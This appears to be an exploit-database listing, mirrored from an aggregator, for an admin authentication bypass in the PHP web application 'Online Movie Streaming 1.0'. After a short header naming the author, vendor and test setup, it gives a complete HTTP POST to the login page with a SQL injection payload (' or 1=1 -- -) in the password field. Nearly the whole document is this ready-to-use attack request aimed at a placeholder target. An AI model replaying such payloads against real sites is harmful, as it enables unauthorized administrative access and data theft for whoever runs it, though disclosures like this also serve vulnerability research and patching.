Exploit for Online Movie Streaming 1.0 SQL Injection

Name: Exploit for Online Movie Streaming 1.0 SQL Injection
Rating: 5 (235 reviews)

2021-01-13 | CVSS 0.6

## https://sploitus.com/exploit?id=PACKETSTORM:160940
# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass  
# Exploit Author: Richard Jones  
# Date: 2021-01-13  
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
#Exploit URL: http://TARGET/onlinemovies/Plogin.php  
POST /onlinemovies/Plogin.php HTTP/1.1  
Host: TARGET  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 48  
Origin: http://TARGET  
Connection: close  
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj  
Upgrade-Insecure-Requests: 1  
  
mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=